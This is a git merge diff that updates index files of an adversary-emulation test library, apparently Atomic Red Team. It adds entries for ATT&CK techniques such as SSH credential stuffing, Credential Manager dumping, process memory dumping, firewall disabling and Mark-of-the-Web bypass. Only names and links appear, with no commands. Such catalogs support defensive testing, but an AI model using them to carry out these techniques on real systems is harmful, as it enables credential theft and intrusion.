Merge branch 'master' into t1105_whois

2021-06-16 09:07:07 -06:00
parent 1531e9d3f0 c7125ac307
commit d0c0fe03dd
44 changed files with 1761 additions and 89 deletions
@@ -5,12 +5,16 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -62,6 +66,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -266,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -354,9 +361,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -11,6 +12,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -88,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
@@ -74,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
@@ -184,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -233,6 +236,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -15,7 +15,9 @@
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
  - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -24,6 +26,8 @@
  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
  - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #1: Run Chrome-password Collector [windows]
  - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -105,7 +109,9 @@
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
  - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -495,10 +501,11 @@
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
  - Atomic Test #1: Disable firewall [linux]
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #1: Disable syslog [linux]
  - Atomic Test #2: Disable Cb Response [linux]
@@ -622,13 +629,16 @@
  - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
  - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
  - Atomic Test #1: System File Copied to Unusual Location [windows]
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -11,7 +11,8 @@
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
  - Atomic Test #1: ListSecrets [macos, linux]
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #2: Extract passwords with grep [macos, linux]
  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
@@ -37,7 +38,9 @@
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
  - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -235,7 +238,8 @@
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -4,7 +4,8 @@
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
  - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -202,7 +203,8 @@
  - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
  - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -12,6 +12,8 @@
  - Atomic Test #4: Access unattend.xml [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
  - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #1: Run Chrome-password Collector [windows]
  - Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -359,10 +361,11 @@
  - Atomic Test #4: Clear Windows Audit Policy Config [windows]
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
  - Atomic Test #11: Uninstall Sysmon [windows]
@@ -439,7 +442,9 @@
  - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
  - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -7,7 +7,7 @@
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
